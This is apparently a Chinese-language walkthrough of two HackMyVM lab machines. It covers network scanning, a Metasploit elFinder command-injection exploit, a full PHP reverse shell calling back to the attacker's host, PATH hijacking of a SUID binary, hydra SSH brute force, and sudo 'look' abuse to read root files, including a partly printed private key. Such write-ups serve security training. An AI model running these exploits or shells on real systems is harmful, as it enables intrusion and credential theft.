link/ether 08:00:27:0e:de:b4 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.105/24 brd 192.168.1.255 scope global dynamic enp0s3
valid_lft 4470sec preferred_lft 4470sec
inet6 fe80::a00:27ff:fe0e:deb4/64 scope link
valid_lft forever preferred_lft forever
3: br-1f21cf17cc68: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:66:6e:80:ab brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-1f21cf17cc68
valid_lft forever preferred_lft forever
inet6 fe80::42:66ff:fe6e:80ab/64 scope link
valid_lft forever preferred_lft forever
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:46:3f:c9:d8 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
7: veth223f8be@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
link/ether 9a:c1:c2:91:86:c9 brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::98c1:c2ff:fe91:86c9/64 scope link
valid_lft forever preferred_lft forever
11: veth657102c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
link/ether 3e:4f:8a:8e:2f:33 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::3c4f:8aff:fe8e:2f33/64 scope link
valid_lft forever preferred_lft forever
12: br-949cb1b62f41: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:f5:08:52:92 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-949cb1b62f41
valid_lft forever preferred_lft forever
inet6 fe80::42:f5ff:fe08:5292/64 scope link
valid_lft forever preferred_lft forever
14: vethff4f21f@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-949cb1b62f41 state UP group default
link/ether 0a:a0:95:05:f2:d9 brd ff:ff:ff:ff:ff:ff link-netnsid 3
inet6 fe80::8a0:95ff:fe05:f2d9/64 scope link
valid_lft forever preferred_lft forever
有一个172.19.0.1的ip,用fscan扫一下
matrioshka@matrioshka:/tmp$ ./fscan -h 172.19.0.1/16
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.19.0.0-172.19.255.255
[*] 已生成IP范围: 172.19.0.0 - 172.19.255.255
[*] 已解析CIDR 172.19.0.1/16 -> IP范围 172.19.0.0-172.19.255.255
[*] 最终有效主机数量: 65536
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.19.0.1 存活 (ICMP)
[+] 目标 172.19.0.2 存活 (ICMP)
接着扫描一下172.19.0.1-2
matrioshka@matrioshka:/tmp$ ./fscan -h 172.19.0.1-2
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 已生成IP范围: 172.19.0.1 - 172.19.0.2
[*] 最终有效主机数量: 2
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.19.0.2 存活 (ICMP)
[+] 目标 172.19.0.1 存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 172.19.0.1:80
[+] 端口开放 172.19.0.2:80
[+] 端口开放 172.19.0.1:22
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[*] 网站标题 http://172.19.0.2 状态码:200 长度:9249 标题:File server
[!] 扫描错误 172.19.0.1:80 - Get "http://172.19.0.1": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[!] 扫描错误 172.19.0.1:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 3/3
[*] 扫描结束,耗时: 6.183240147s
但是这是在内网里面,需要把它转发出来,这里使用了一个工具叫socat,可以使用命令tldr socat查看一下手册
┌──(root㉿kali-plus)-[~/socat]
└─# tldr socat
Multipurpose relay (SOcket CAT).
More information: <http://www.dest-unreach.org/socat/>.
Listen to a port, wait for an incoming connection and transfer data to STDIO:
sudo socat - TCP-LISTEN:8080,fork
Listen on a port using SSL and print to STDOUT:
sudo socat OPENSSL-LISTEN:4433,reuseaddr,cert=./cert.pem,cafile=./ca.cert.pem,key=./key.pem,verify=0 STDOUT
Create a connection to a host and port, transfer data in STDIO to connected host:
sudo socat - TCP4:www.example.com:80
Forward incoming data of a local port to another host and port:
sudo socat TCP-LISTEN:80,fork TCP4:www.example.com:80
Send data with multicast routing scheme:
echo "Hello Multicast" | socat - UDP4-DATAGRAM:224.0.0.1:5000
Receive data from a multicast:
socat - UDP4-RECVFROM:5000
但是我这个socat一直有问题,用不了,看ll10456的复盘视频就好了
https://www.bilibili.com/video/BV1NXRHYJE14/?vd_source=99de32ae331fc7af197869d5fa80b772
root flag
7f5d6dbbaff0a1fc6d2a5c9160362908
lookup
信息搜集
ip地址为192.168.1.105
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 18:24 CST
Nmap scan report for mamushka.hmv (192.168.1.105)
Host is up (0.0034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:90:76:B8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds
端口开放了22和80,80端口是一个登录页面,admin/admin登录的时候显示的是密码错误,使用其他用户名的时候显示的是用户名或者密码错误,说明是有admin这个用户的,所以直接爆破,但是没有直接爆破出来密码,但是当密码是password123的时候,显示的是用户名或者密码错误,这就说明密码是对的,用户名不对,下面就是找一个用户名,使用Seclists里面的names.txt字典,爆破得到用户名是jose,看了一眼作者,作者是josemlwdf
登录进去之后是一个文件管理页面,可以上传文件什么的,但是给的这些文件好像都没有什么用,发现目录是elFinder,先扫一下这个目录
┌──(root㉿zss)-[/home/zss]
└─# dirsearch -u http://files.lookup.hmv/elFinder
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/zss/reports/http_files.lookup.hmv/_elFinder_25-03-19_20-53-38.txt
Target: http://files.lookup.hmv/
[20:53:38] Starting: elFinder/
[20:53:38] 301 - 326B - /elFinder/js -> http://files.lookup.hmv/elFinder/js/
[20:53:38] 301 - 327B - /elFinder/php -> http://files.lookup.hmv/elFinder/php/
[20:53:54] 200 - 638B - /elFinder/bower.json
[20:53:55] 200 - 54KB - /elFinder/Changelog
[20:53:56] 200 - 1KB - /elFinder/composer.json
[20:53:57] 301 - 327B - /elFinder/css -> http://files.lookup.hmv/elFinder/css/
[20:54:01] 301 - 329B - /elFinder/files -> http://files.lookup.hmv/elFinder/files/
[20:54:01] 200 - 724B - /elFinder/files/
[20:54:03] 301 - 327B - /elFinder/img -> http://files.lookup.hmv/elFinder/img/
[20:54:05] 200 - 532B - /elFinder/js/
[20:54:06] 200 - 1KB - /elFinder/LICENSE.md
[20:54:11] 200 - 427B - /elFinder/package.json
[20:54:12] 200 - 903B - /elFinder/php/
发现有一个Changelog,看看有没有什么信息
* elFinder (2.1.47):
- [js] Fixed #2820 remove Multi-byte space characters
- [js:jqueryelfinder] bugfix of elfinder reload(restart) on dialogelfinder
- [ui:places] Fixed #2822 set title attr correctly
- [ui:tree] add an option `uiOptions.tree.attrTitle` to enable set path info to title attr
- [js:editors.default] support tinyMCE 5 and integrate image uploader
- [js:dialogelfinder] Fixed #2824 freezes browser in uses dialogelfinder
- [ui:button] add CSS class `elfinder-button-{COMMAND NAME}-menu` to submenu
- [ui:sortbutton] Fixed #2829 sort menu is not synchronized with the data of cwd
- [ui:cwd] Fixed #2840 thumbnail is not created when adding an image to an empty folder
- [ui:cwd] Fixed #2836 setting CWD icons size not working
- [php:core] Fixed #2842 allow to cancel upload on upload.presave callback
- [js:core] Fixed #2845 `size` request with wrong params `targets`
- [php:session] Fixed #2857 consideration for environment other than "apache2 SAPI"
- [cmd:fullscreen] Fixed #2858 add an option of fullscreen mode screen/window
- And some minor bug fixes
可以看到是elFinder 2.1.47的版本,去搜一下有没有可以利用的漏洞poc,发现是有的,直接使用msf好了
search elFinder
set rhosts files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.1.106:4444
[*] Uploading payload 'UBij6VlJ.jpg;echo 6370202e2e2f66696c65732f5542696a36566c4a2e6a70672a6563686f2a202e6656314b69776f43544c2e706870 |xxd -r -p |sh& #.jpg' (1966 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.fV1KiwoCTL.php) ...
[*] Sending stage (40004 bytes) to 192.168.1.105
[+] Deleted .fV1KiwoCTL.php
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.105:34664) at 2025-03-19 21:06:45 +0800
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 5494 created.
Channel 0 created.
www-data@lookup:/var/www/files.lookup.hmv/public_html/elFinder/php$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
可以使用下面的reverse.php再弹一个shell到另一个窗口
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.106'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
只需要改个ip地址就行了
user flag
$ find / -user root -perm -4000 -print 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
其中发现一个/usr/sbin/pwm
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
这个意思就是说如果输入id得到的结果是think的话,就能返回.password里面的内容了,那么接下来就是伪造一个输出了,这里有个知识点是变量劫持
$ which id
/usr/bin/id
$ cd /tmp
$ pwd
/tmp
$ echo 'echo think' > /tmp/id
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ export PATH=/tmp:$PATH
$ which id
/usr/bin/id
$ chmod +x /tmp/id
$ export PATH=/tmp:$PATH
$ which id
/tmp/id
$ id
think
$ /usr/sbin/pwm
[-] Error reading username from id command
: Success
[!] Running 'id' command to extract the username and user ID (UID)
$ /usr/bin/id think
uid=1000(think) gid=1000(think) groups=1000(think)
$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' > /tmp/id
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
下面就是把这个当作字典,使用hydra对密码进行爆破
┌──(root㉿zss)-[/]
└─# hydra -l think -P lookup.txt ssh://192.168.1.105 -V -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-19 21:55:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per task
[DATA] attacking ssh://192.168.1.105:22/
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose100190" - 5 of 49 [child 4] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10001" - 6 of 49 [child 5] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10.asd" - 7 of 49 [child 6] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose10+" - 8 of 49 [child 7] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0_07" - 9 of 49 [child 8] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0990" - 10 of 49 [child 9] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0986$" - 11 of 49 [child 10] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose098130443" - 12 of 49 [child 11] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0981" - 13 of 49 [child 12] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0924" - 14 of 49 [child 13] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0923" - 15 of 49 [child 14] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose0921" - 16 of 49 [child 15] (0/0)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "thepassword" - 17 of 52 [child 7] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose(1993)" - 18 of 52 [child 0] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose'sbabygurl" - 19 of 52 [child 1] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&vane" - 20 of 52 [child 14] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&takie" - 21 of 52 [child 5] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&samantha" - 22 of 52 [child 4] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&pam" - 23 of 52 [child 2] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jlo" - 24 of 52 [child 6] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jessica" - 25 of 52 [child 8] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose&jessi" - 26 of 52 [child 12] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "josemario.AKA(think)" - 27 of 52 [child 10] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose.medina." - 28 of 52 [child 13] (0/3)
[ATTEMPT] target 192.168.1.105 - login "think" - pass "jose.mar" - 29 of 52 [child 3] (0/3)
[22][ssh] host: 192.168.1.105 login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-19 21:55:49
密码是 josemario.AKA(think)
┌──(root㉿zss)-[/]
└─# ssh think@192.168.1.105
The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established.
ED25519 key fingerprint is SHA256:Ndgax/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.105' (ED25519) to the list of known hosts.
think@192.168.1.105's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 19 Mar 2025 02:00:11 PM UTC
System load: 0.0 Processes: 207
Usage of /: 58.7% of 9.75GB Users logged in: 0
Memory usage: 39% IPv4 address for enp0s17: 192.168.1.105
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
7 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Thu Jan 11 20:17:32 2024 from 192.168.1.13
think@lookup:~$ ls
user.txt
think@lookup:~$ cat user.txt
38375fb4dd8baa2b2039ac03d92b820e
提权-root flag
think@lookup:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
可以直接读root flag
think@lookup:~$ sudo look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
也可以读取ssh私钥然后ssh连接上去
think@lookup:~$ sudo look '' /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf/h23TCH7qKRg4Penlti9RKW2XLSB5wR
Qcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM/zDb//ZlnlwCwKQ5XyTQU/vHfROfU0pnR
j7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR/+ybAIVbB+ya/D5r9DYPmatUTLlHD
bV55xi6YcfV7rjbOpjRj8hgubYgjL26BwszbaHKSkI+NcVNPmgquy5Xw8gh3XciFhNLqmd
ISF9fxn5i1vQDB318owoPPZB1rIuMPH3C0SIno42FiqFO/fb1/wPHGasBmLzZF6Fr8/EHC
4wRj9tqsMZfD8xkk2FACtmAFH90ZHXg5D+pwujPDQAuULODP8Koj4vaMKu2CgH3+8I3xRM
hufqHa1+Qe3Hu++7qISEWFHgzpRMFtjPFJEGRzzh2x8F+wozctvn3tcHRv321W5WJGgzhd
k5ECnuu8Jzpg25PEPKrvYf+lMUQebQSncpcrffr9AAAFiJB/j92Qf4/dAAAAB3NzaC1yc2
EAAAGBAKbZtvg4qVX1DGPu4PS3Jn/4dt0wh+6ikYOD3p5bYvUSltly0gecEUHKstc0RQyr
UUBoX06vmH1X26CQTwnyh3aUKjP8w2//2ZZ5cAsCkOV8k0FP7x30Tn1NKZ0Y+3iKcOdCez
xjzRu0QIGz+bSdjXLBWAIn5sTKyT1Uf/smwCFWwfsmvw+a/Q2D5mrVEy5Rw21eecYumHH1
e642zqY0Y/IYLm2IIy9ugcLM22hykpCPjXFTT5oKrsuV8PIId13IhYTS6pnSEhfX8Z+Ytb
0Awd9fKMKDz2QdayLjDx9wtEiJ6ONhYqhTv329f8DxxmrAZi82Reha/PxBwuMEY/barDGX
w/MZJNhQArZgBR/dGR14OQ/qcLozw0ALlCzgz/CqI+L2jCrtgoB9/vCN8UTIbn6h2tfkHt
x7vvu6iEhFhR4M6UTBbYzxSRBkc84dsfBfsKM3Lb597XB0b99tVuViRoM4XZORAp7rvCc6
YNuTxDyq72H/pTFEHm0Ep3KXK336/QAAAAMBAAEAAAGBAJ4t2wO6G/eMyIFZL1Vw6QP7Vx
zdbJE0+AUZmIzCkK9MP0zJSQrDz6xy8VeKi0e2huIr0Oc1G7kA+QtgpD4G+pvVXalJoTLl
+K9qU2lstleJ4cTSdhwMx/iMlb4EuCsP/HeSFGktKH9yRJFyQXIUx8uaNshcca/xnBUTrf
05QH6a1G44znuJ8QvGF0UC2htYkpB2N7ZF6GppUybXeNQi6PnUKPfYT5shBc3bDssXi5GX
Nn3QgK/GHu6NKQ8cLaXwefRUD6NBOERQtwTwQtQN+n/xIs77kmvCyYOxzyzgWoS2zkhXUz
YZyzk8d2PahjPmWcGW3j3AU3A3ncHd7ga8K9zdyoyp6nCF+VF96DpZSpS2Oca3T8yltaR1
